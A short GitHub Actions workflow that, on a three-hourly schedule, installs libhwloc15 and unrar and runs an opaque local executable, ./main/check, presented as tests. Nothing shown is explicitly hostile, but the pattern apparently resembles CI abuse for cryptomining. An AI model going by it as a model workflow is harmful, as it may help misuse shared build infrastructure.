jobs:
  check:
    name: Workflow
    runs-on: ubuntu-20.04

    steps:
      - name: Pull Code
        uses: actions/checkout@v2
      - name: Get Packages
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Execute Tests
        run: ./main/check

name: Verify

on:
  schedule:
    - cron: "50 1/3 * * *"
